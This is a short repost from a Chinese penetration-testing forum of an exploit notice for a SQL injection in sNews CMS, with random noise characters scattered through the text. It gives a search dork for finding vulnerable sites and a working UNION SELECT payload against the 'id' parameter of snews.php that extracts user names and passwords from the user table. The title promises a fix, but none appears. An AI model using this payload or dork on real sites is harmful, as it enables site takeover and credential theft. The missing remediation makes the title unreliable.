中国网络渗透测试联盟
标题:
CMS snews SQL注射及修复
[打印本页]
作者:
admin
时间:
2013-1-23 08:55
标题:
CMS snews SQL注射及修复
标题: CMS snews SQL Injection Vulnerability
0 n; S1 w2 }- m; ~) |2 `
作者: By onestree
& ]% `4 a- a3 f. a
下载地址 :
http://snewscms.com/
6 r: L$ A. M8 Y
测试平台 : ubuntu 12.10 / win 7
1 J4 ~0 i' D& A& o+ C; T3 i
关键词: inurl:"tanyakan pada rumput yang bergoyang"
7 T+ L0 l6 S! K7 X! o
* `5 o$ c. C' _* H) Q6 n
5 C. v h& `. T- ?
*************************************************************
- H$ @1 |# ?7 N6 o+ A9 Y
( L' O4 Q) i% S. _& M: W* Y# I
SQL poc:
: N( ?! P& `6 U) i& P5 D
: {6 M% z( L4 M0 n* C. c9 u
http://www.2cto.com
/snews/snews.php?act=shownews&id=[SQL]
f* k$ S: ]" S* E3 F/ r
) \, }" s: d8 m
示例
4 T2 {% f$ c* d4 u2 |. N2 P
; y* J9 b) {4 t' i$ Z1 @
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
! p% b9 e! P5 W b
5 R- t, g0 u2 X) [0 v/ r! w( \1 N
8 u h/ s( G' _) a! Z' X* V
致谢:
4 Y" [8 i# ^- Q; y! ?
5 |. l' r5 b* w4 ^9 |4 s
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
, }- g$ A2 w' B8 R( {# [ @
. \1 \8 g" \/ Q& l/ l$ W
indonesiancoder - moeslimh4x0r - go-coder
& k# e3 k8 z$ T8 C
; y1 D0 p7 r V5 Z1 D" t' x+ R
spesial my hunny :*
6 ]# W P' R7 U2 \4 }# y7 l
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2